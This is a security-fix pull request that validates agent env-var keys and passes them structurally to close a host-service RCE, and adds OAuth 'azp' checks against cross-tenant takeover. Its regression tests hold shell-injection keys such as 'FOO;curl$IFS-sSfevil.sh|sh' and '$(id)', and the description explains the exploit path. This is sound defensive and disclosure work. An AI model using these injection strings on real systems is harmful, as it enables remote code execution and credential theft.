### PR TITLE
fix(security): validate env keys to close host-service RCE and gate MCP azp to close cross-tenant ATO

### DIFF
--- a/apps/api/src/app/api/agent/[transport]/auth-flow.test.ts
+++ b/apps/api/src/app/api/agent/[transport]/auth-flow.test.ts
@@ -1,0 +1,81 @@
+import { describe, expect, mock, test } from "bun:test";
+
+mock.module("@/env", () => ({
+	env: { NEXT_PUBLIC_API_URL: "http://localhost" },
+}));
+
+import type { McpContext } from "@superset/mcp/auth";
+import { type McpRequestDeps, verifyToken } from "./auth-flow";
+
+// A JWT-shaped bearer token (three non-empty dot-separated parts) so the
+// verifier takes the OAuth branch. The signature is never checked here — the
+// injected verifyAccessToken stub decides the payload.
+const JWT = "header.payload.signature";
+
+function makeDeps(
+	payload: Record<string, unknown>,
+	overrides: Partial<McpRequestDeps> = {},
+): McpRequestDeps {
+	return {
+		apiUrl: "http://localhost",
+		authApi: {
+			getSession: async () => null,
+			verifyApiKey: async () => ({ valid: false, key: null }),
+		},
+		createServer: (() => {
+			throw new Error("not used");
+		}) as unknown as McpRequestDeps["createServer"],
+		createTransport: () => {
+			throw new Error("not used");
+		},
+		verifyAccessToken: (async () =>
+			payload) as unknown as McpRequestDeps["verifyAccessToken"],
+		...overrides,
+	};
+}
+
+function mcpRequest(): Request {
+	return new Request("http://localhost/api/agent/mcp", {
+		headers: { authorization: `Bearer ${JWT}` },
+	});
+}
+
+describe("verifyToken — MCP OAuth azp gate", () => {
+	test("rejects a token minted to an untrusted (attacker DCR) client", async () => {
+		const deps = makeDeps({
+			sub: "victim-user",
+			organizationId: "victim-org",
+			azp: "attacker-dcr-client",
+		});
+
+		const info = await verifyToken(mcpRequest(), deps);
+
+		expect(info).toBeUndefined();
+	});
+
+	test("accepts a token from a trusted client", async () => {
+		const deps = makeDeps({
+			sub: "victim-user",
+			organizationId: "victim-org",
+			azp: "superset-cli",
+		});
+
+		const info = await verifyToken(mcpRequest(), deps);
+
+		expect(info).toBeDefined();
+		const ctx = info?.extra?.mcpContext as McpContext;
+		expect(ctx.userId).toBe("victim-user");
+		expect(ctx.organizationId).toBe("victim-org");
+	});
+
+	test("accepts a first-party token with no azp claim", async () => {
+		const deps = makeDeps({
+			sub: "user",
+			organizationId: "org",
+		});
+
+		const info = await verifyToken(mcpRequest(), deps);
+
+		expect(info).toBeDefined();
+	});
+});

--- a/apps/api/src/app/api/agent/[transport]/auth-flow.ts
+++ b/apps/api/src/app/api/agent/[transport]/auth-flow.ts
@@ -4,6 +4,7 @@ import type { createMcpServer } from "@superset/mcp";
 import type { McpContext } from "@superset/mcp/auth";
 import type { verifyAccessToken as verifyOAuthAccessToken } from "better-auth/oauth2";
 import { getOAuthProtectedResourceMetadataUrl } from "@/lib/oauth-metadata";
+import { isUntrustedAuthorizedParty } from "@/lib/trusted-clients";
 
 interface SessionUser {
 	id: string;
@@ -159,6 +160,17 @@ function buildOAuthAuthInfo(
 	bearerToken: string,
 	payload: Record<string, unknown>,
 ): AuthInfo | undefined {
+	// Reject victim-scoped tokens minted to attacker-registered DCR clients:
+	// an untrusted `azp` must not be honored on the MCP surface, otherwise it
+	// grants the attacker the victim's agent context (cross-tenant ATO). This
+	// mirrors the tRPC boundary check in trpc/context.ts.
+	if (isUntrustedAuthorizedParty(payload)) {
+		console.error("[mcp/auth] Access token has untrusted azp; rejecting", {
+			azp: payload.azp,
+		});
+		return undefined;
+	}
+
 	if (
 		typeof payload.sub !== "string" ||
 		typeof payload.organizationId !== "string"

--- a/apps/api/src/app/api/auth/[...all]/route.ts
+++ b/apps/api/src/app/api/auth/[...all]/route.ts
@@ -1,7 +1,38 @@
 import { auth } from "@superset/auth/server";
 import { toNextJsHandler } from "better-auth/next-js";
+import { verifyAccessToken } from "better-auth/oauth2";
+import { env } from "@/env";
+import { isUntrustedAuthorizedParty } from "@/lib/trusted-clients";
 
 const { GET: _GET, POST: _POST } = toNextJsHandler(auth);
+
+const apiUrl = env.NEXT_PUBLIC_API_URL.replace(/\/+$/, "");
+
+/**
+ * The native Better Auth userinfo endpoint returns the token subject's
+ * identity but does not validate `azp`. Reject a victim-scoped token minted to
+ * an attacker-registered DCR client before it can leak the victim's identity
+ * (cross-tenant ATO), mirroring the MCP and tRPC boundary checks. Tokens that
+ * fail verification fall through to Better Auth's own handling.
+ */
+async function rejectsUntrustedUserInfo(req: Request): Promise<boolean> {
+	const match = req.headers.get("authorization")?.match(/^Bearer\s+(.+)$/i);
+	const token = match?.[1];
+	if (!token || token.split(".").length !== 3) return false;
+
+	try {
+		const payload = (await verifyAccessToken(token, {
+			jwksUrl: `${apiUrl}/api/auth/jwks`,
+			verifyOptions: {
+				issuer: apiUrl,
+				audience: [apiUrl, `${apiUrl}/`],
+			},
+		})) as Record<string, unknown>;
+		return isUntrustedAuthorizedParty(payload);
+	} catch {
+		return false;
+	}
+}
 
 /**
  * Normalize localhost variants in a URL so that `localhost` and `127.0.0.1`
@@ -15,6 +46,11 @@ function normalizeLocalhostUri(uri: string): string {
 
 const GET = async (req: Request) => {
 	const url = new URL(req.url);
+	if (url.pathname.endsWith("/oauth2/userinfo")) {
+		if (await rejectsUntrustedUserInfo(req)) {
+			return new Response("Unauthorized", { status: 401 });
+		}
+	}
 	if (url.pathname.endsWith("/oauth2/authorize")) {
 		const redirectUri = url.searchParams.get("redirect_uri");
 		if (redirectUri) {
@@ -30,6 +66,11 @@ const GET = async (req: Request) => {
 
 const POST = async (req: Request) => {
 	const url = new URL(req.url);
+	if (url.pathname.endsWith("/oauth2/userinfo")) {
+		if (await rejectsUntrustedUserInfo(req)) {
+			return new Response("Unauthorized", { status: 401 });
+		}
+	}
 	if (url.pathname.endsWith("/oauth2/register")) {
 		const cloned = req.clone();
 		const body = await cloned.json().catch(() => null);

--- a/apps/api/src/lib/trusted-clients.ts
+++ b/apps/api/src/lib/trusted-clients.ts
@@ -1,0 +1,22 @@
+/**
+ * OAuth clients we trust to mint first-party access tokens carrying a user's
+ * org context. Dynamically-registered (DCR) clients are attacker-controllable,
+ * so a token whose `azp` (authorized party) names an untrusted client must not
+ * be honored on privileged surfaces — otherwise a victim-scoped token minted
+ * to an attacker's DCR client grants cross-tenant access (ATO).
+ */
+export const TRUSTED_API_CLIENTS = new Set(["superset-cli"]);
+
+/**
+ * True when the token's `azp` claim is present and names a client outside the
+ * trusted set. A missing `azp` (native first-party tokens) is allowed.
+ */
+export function isUntrustedAuthorizedParty(
+	payload: Record<string, unknown>,
+): boolean {
+	const authorizedClientId =
+		typeof payload.azp === "string" ? payload.azp : null;
+	return (
+		authorizedClientId !== null && !TRUSTED_API_CLIENTS.has(authorizedClientId)
+	);
+}

--- a/apps/api/src/trpc/context.ts
+++ b/apps/api/src/trpc/context.ts
@@ -5,10 +5,9 @@ import { createTRPCContext } from "@superset/trpc";
 import { verifyAccessToken } from "better-auth/oauth2";
 import { eq } from "drizzle-orm";
 import { env } from "@/env";
+import { isUntrustedAuthorizedParty } from "@/lib/trusted-clients";
 
 const apiUrl = env.NEXT_PUBLIC_API_URL.replace(/\/+$/, "");
-
-const TRUSTED_API_CLIENTS = new Set(["superset-cli"]);
 
 function looksLikeJwt(token: string): boolean {
 	const parts = token.split(".");
@@ -36,9 +35,7 @@ async function sessionFromOAuthBearer(
 		return null;
 	}
 
-	const authorizedClientId =
-		typeof payload.azp === "string" ? payload.azp : null;
-	if (authorizedClientId && !TRUSTED_API_CLIENTS.has(authorizedClientId)) {
+	if (isUntrustedAuthorizedParty(payload)) {
 		return null;
 	}
 

--- a/packages/host-service/src/terminal/env.test.ts
+++ b/packages/host-service/src/terminal/env.test.ts
@@ -458,6 +458,26 @@ describe("buildV2TerminalEnv", () => {
 		expect(devEnv.SUPERSET_ROOT_PATH).toBe("");
 	});
 
+	test("applies agentEnv structurally, overriding the base snapshot", () => {
+		const env = buildV2TerminalEnv({
+			...baseParams,
+			agentEnv: { ANTHROPIC_API_KEY: "sk-test", PATH: "/agent/bin" },
+		});
+		expect(env.ANTHROPIC_API_KEY).toBe("sk-test");
+		expect(env.PATH).toBe("/agent/bin");
+	});
+
+	test("carries a shell-metacharacter env key as a plain var, never parsed", () => {
+		// If this key were interpolated into a shell command it would be RCE.
+		// Passed structurally it is just an (odd) env var name — inert.
+		const injectionKey = "FOO;curl$IFS-sSfevil.sh|sh";
+		const env = buildV2TerminalEnv({
+			...baseParams,
+			agentEnv: { [injectionKey]: "1" },
+		});
+		expect(env[injectionKey]).toBe("1");
+	});
+
 	test("defaults COLORFGBG to dark mode", () => {
 		const env = buildV2TerminalEnv(baseParams);
 		expect(env.COLORFGBG).toBe("15;0");

--- a/packages/host-service/src/terminal/env.ts
+++ b/packages/host-service/src/terminal/env.ts
@@ -139,6 +139,12 @@ interface BuildV2TerminalEnvParams {
 	 * no state change. See the router for rationale.
 	 */
 	hostAgentHookUrl?: string;
+	/**
+	 * Agent-config env overlay, applied last so it wins over the base snapshot.
+	 * Passed structurally into the PTY spawn env — never interpolated into a
+	 * shell command string — so keys/values can't inject shell metacharacters.
+	 */
+	agentEnv?: Record<string, string>;
 }
 
 /**
@@ -162,6 +168,7 @@ export function buildV2TerminalEnv(
 		agentHookPort,
 		agentHookVersion,
 		hostAgentHookUrl,
+		agentEnv,
 	} = params;
 
 	// Defense in depth — baseEnv is pre-stripped at init, but strip again
@@ -217,6 +224,13 @@ export function buildV2TerminalEnv(
 		hasMacosSystemCertBundle()
 	) {
 		env.SSL_CERT_FILE = MACOS_SYSTEM_CERT_FILE;
+	}
+
+	// Applied last: agent-config env overrides the base snapshot. Only valid
+	// POSIX identifier keys reach here (validated at the tRPC boundary), and
+	// they never touch shell parsing — node-pty sets them structurally.
+	if (agentEnv) {
+		Object.assign(env, agentEnv);
 	}
 
 	return env;

--- a/packages/host-service/src/terminal/terminal.ts
+++ b/packages/host-service/src/terminal/terminal.ts
@@ -906,6 +906,12 @@ interface CreateTerminalSessionOptions {
 	db: HostDb;
 	eventBus?: EventBus;
 	initialCommand?: string;
+	/**
+	 * Agent-config env overlay spawned structurally into the PTY. Prefer this
+	 * over prefixing `KEY=value` onto `initialCommand`, which would let a
+	 * crafted key inject shell metacharacters (RCE).
+	 */
+	extraEnv?: Record<string, string>;
 	cwd?: string;
 	/** Hidden sessions are process-internal and should not appear in user pickers. */
 	listed?: boolean;
@@ -967,6 +973,7 @@ export async function createTerminalSessionInternal({
 	db,
 	eventBus,
 	initialCommand,
+	extraEnv,
 	cwd: cwdOverride,
 	listed = true,
 	cols: requestedCols,
@@ -1053,6 +1060,7 @@ export async function createTerminalSessionInternal({
 		agentHookPort: process.env.SUPERSET_AGENT_HOOK_PORT || "",
 		agentHookVersion: process.env.SUPERSET_AGENT_HOOK_VERSION || "",
 		hostAgentHookUrl: getHostAgentHookUrl(),
+		...(extraEnv ? { agentEnv: extraEnv } : {}),
 	});
 
 	let daemon: DaemonClient;

--- a/packages/host-service/src/trpc/router/agents/agents.ts
+++ b/packages/host-service/src/trpc/router/agents/agents.ts
@@ -7,7 +7,6 @@ import {
 import {
 	buildArgvCommand,
 	buildPromptCommandString,
-	envOverlayPrefix,
 	sanitizePromptForPty,
 } from "@superset/shared/agent-prompt-launch";
 import { TRPCError } from "@trpc/server";
@@ -259,7 +258,11 @@ async function runTerminalAgent(
 		...effortArgs,
 	]);
 	const modelEnv = buildAgentModelEnv(config.presetId, input.model);
-	const fullCommand = `${envOverlayPrefix({ ...config.env, ...modelEnv })}${command}`;
+	// Pass agent env structurally into the PTY spawn rather than prefixing
+	// `KEY=value` onto the command string — an unquoted key would otherwise be
+	// a shell-injection vector (RCE). Keys are also validated at the config
+	// boundary (settings.agentConfigs), so this is defense in depth.
+	const agentEnv = { ...config.env, ...modelEnv };
 
 	const terminalId = crypto.randomUUID();
 	const result = await createTerminalSessionInternal({
@@ -267,7 +270,8 @@ async function runTerminalAgent(
 		workspaceId: input.workspaceId,
 		db: ctx.db,
 		eventBus: ctx.eventBus,
-		initialCommand: fullCommand,
+		initialCommand: command,
+		...(Object.keys(agentEnv).length > 0 ? { extraEnv: agentEnv } : {}),
 	});
 
 	if ("error" in result) {

--- a/packages/host-service/src/trpc/router/settings/agent-configs.test.ts
+++ b/packages/host-service/src/trpc/router/settings/agent-configs.test.ts
@@ -159,6 +159,62 @@ describe("agentConfigsRouter", () => {
 			expect(created.env).toEqual({ FOO: "bar" });
 		});
 
+		it("rejects env keys containing shell metacharacters (RCE guard)", async () => {
+			const caller = createCaller();
+			await caller.list();
+
+			// A key like this would inject a command if interpolated unquoted into
+			// a PTY launch prefix (`KEY=value ...`).
+			await expect(
+				caller.add({
+					label: "Evil",
+					command: "echo",
+					args: [],
+					promptTransport: "argv",
+					promptArgs: [],
+					env: { "FOO;curl$IFS-sSf$IFSevil.sh|sh;X": "1" },
+				}),
+			).rejects.toThrow();
+		});
+
+		it("rejects env keys that are not valid POSIX identifiers", async () => {
+			const caller = createCaller();
+			await caller.list();
+
+			for (const badKey of ["9FOO", "FOO BAR", "FOO-BAR", "$(id)", ""]) {
+				await expect(
+					caller.add({
+						label: "Bad",
+						command: "echo",
+						args: [],
+						promptTransport: "argv",
+						promptArgs: [],
+						env: { [badKey]: "1" },
+					}),
+				).rejects.toThrow();
+			}
+		});
+
+		it("accepts valid POSIX env identifiers", async () => {
+			const caller = createCaller();
+			await caller.list();
+
+			const created = await caller.add({
+				label: "Good",
+				command: "echo",
+				args: [],
+				promptTransport: "argv",
+				promptArgs: [],
+				env: { FOO_BAR: "1", _UNDERSCORE: "2", API_KEY2: "3" },
+			});
+
+			expect(created.env).toEqual({
+				FOO_BAR: "1",
+				_UNDERSCORE: "2",
+				API_KEY2: "3",
+			});
+		});
+
 		it("preserves an arbitrary presetId tag verbatim", async () => {
 			const caller = createCaller();
 			await caller.list();

--- a/packages/host-service/src/trpc/router/settings/agent-configs.ts
+++ b/packages/host-service/src/trpc/router/settings/agent-configs.ts
@@ -14,7 +14,16 @@ import { protectedProcedure, router } from "../../index";
 const promptTransportSchema = z.enum(["argv", "stdin"]);
 
 const argvSchema = z.array(z.string());
-const envSchema = z.record(z.string(), z.string());
+// Env keys become `KEY=value` assignments in a PTY launch prefix, so an
+// unconstrained key is a shell-injection vector (RCE). Only accept valid POSIX
+// env-var identifiers; values are still shell-quoted at the launch site.
+const envKeySchema = z
+	.string()
+	.regex(
+		/^[A-Za-z_][A-Za-z0-9_]*$/,
+		"Env var names must be valid POSIX identifiers ([A-Za-z_][A-Za-z0-9_]*)",
+	);
+const envSchema = z.record(envKeySchema, z.string());
 
 export interface HostAgentConfig {
 	id: string;


### PR DESCRIPTION
## Summary

Fixes two critical vulnerabilities responsibly disclosed by external researchers **Jemin Khunt** (cyber.jemin@gmail.com) and **Hitarth Shah** (shahhits12@gmail.com). Both were confirmed present in this codebase.

The third finding from the same disclosure — chat-session BOLA (PR #5017) — is **already fixed and out of scope** here; this PR does not touch it.

---

### Issue 1 — RCE via env-key shell injection in host-service (P0, CVSS 9.9)

`runTerminalAgent` built a PTY launch command by prefixing `KEY=value` assignments via `envOverlayPrefix()`. Values were shell-quoted (`quoteSingleShell`), but **keys were not**, and `settings.agentConfigs.add` accepted `z.record(z.string(), z.string())` with no key format restriction. An attacker could store an env key containing shell metacharacters (e.g. `FOO;curl$IFS-sSf…|sh`), then trigger `agents.run` to execute arbitrary shell on any connected host — full RCE with access to `~/.ssh`, `~/.aws/credentials`, API keys, and all git repos. Researchers confirmed live hostname/username exfiltration.

**Fix (both layers):**
- **Boundary validation:** env keys must now be valid POSIX identifiers (`/^[A-Za-z_][A-Za-z0-9_]*$/`) in `agentConfigs` add/update schemas.
- **Defense in depth:** agent env is now threaded **structurally** into the PTY spawn env (`buildV2TerminalEnv` `agentEnv` → `createTerminalSessionInternal` `extraEnv`) instead of being interpolated into a shell prefix, so keys/values never touch shell parsing. `runTerminalAgent` no longer builds a shell prefix string.

### Issue 2 — OAuth cross-tenant ATO via un-gated MCP surface (azp not validated)

The tRPC boundary already rejected attacker-registered DCR-client tokens via a `TRUSTED_API_CLIENTS` / `azp` check. The MCP bearer path had **no such gate**: `buildOAuthAuthInfo` verified the JWT by signature + issuer + audience only and read `azp` but never validated it. A victim-scoped token minted to an attacker-registered DCR client was accepted at `/api/agent/mcp` and `/api/v2/agent/mcp`, granting the attacker the victim's agent context. Native Better Auth `/api/auth/oauth2/userinfo` was likewise un-gated.

**Fix:**
- Reject tokens whose `azp` is present and **not** in the trusted client set inside `buildOAuthAuthInfo`.
- Apply the same gate to `/api/auth/oauth2/userinfo` (GET and POST) in the Better Auth `[...all]` route.
- Extracted the trusted-client list + check into a shared `apps/api/src/lib/trusted-clients.ts` helper, now reused by `trpc/context.ts` (no duplicated list).

---

## Tests

- `agent-configs.test.ts`: malicious/invalid env keys (incl. `FOO;curl$IFS…`) are rejected; valid POSIX identifiers accepted.
- `env.test.ts`: agent env is applied structurally and a metacharacter key is carried as an inert plain var, never parsed as shell.
- `auth-flow.test.ts`: an MCP token with an untrusted `azp` is rejected at `verifyToken`; trusted / no-`azp` tokens still accepted.

Each new test was verified to **fail against the unpatched code** and pass after the fix. `bun run lint` exits 0; `typecheck` and the affected test suites pass.

## Credits

Thanks to **Jemin Khunt** and **Hitarth Shah** for the responsible disclosure.


<!-- stage-review-badge-begin -->

---

<a href="https://stagereview.app/superset-sh/superset/pull/5735">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://stagereview.app/assets/gh-open-in-stage-dark.svg">
    <img src="https://stagereview.app/assets/gh-open-in-stage-light.svg" alt="Open in Stage">
  </picture>
</a>

<!-- stage-review-badge-end -->

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Fixes a host-service RCE by validating env keys and passing env vars structurally, and closes a cross-tenant OAuth ATO by enforcing `azp` checks on MCP and `/api/auth/oauth2/userinfo`.

- **Bug Fixes**
  - Validate env keys in `agent-configs` to POSIX identifiers (`/^[A-Za-z_][A-Za-z0-9_]*$/`) to block shell injection.
  - Pass agent env structurally to the PTY (`buildV2TerminalEnv` `agentEnv`, `createTerminalSessionInternal` `extraEnv`); stop prefixing `KEY=value` onto commands in `runTerminalAgent`.
  - Reject tokens with untrusted `azp` in MCP OAuth auth and in Better Auth `/api/auth/oauth2/userinfo` (GET/POST); allow first‑party tokens without `azp`.

- **Refactors**
  - Added `apps/api/src/lib/trusted-clients.ts` with `TRUSTED_API_CLIENTS` and `isUntrustedAuthorizedParty`, reused by `trpc/context.ts` and MCP auth.

<sup>Written for commit 5fd55a1c1bebf7cf8a7c6e1bf358f3f98b0b5f56. Summary will update on new commits.</sup>

<a href="https://cubic.dev/pr/superset-sh/superset/pull/5735?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>

<!-- End of auto-generated description by cubic. -->



<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Security**
  * Strengthened OAuth authentication by rejecting tokens from untrusted clients.
  * Added protection for OAuth user-info requests against unauthorized tokens.

* **Enhancements**
  * Agent environment variables are now applied directly to terminal sessions.
  * Agent configuration validates environment variable names using POSIX-compatible rules.

* **Tests**
  * Added coverage for trusted and untrusted OAuth clients.
  * Added tests for environment variable overrides and validation, including shell-metacharacter protection.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->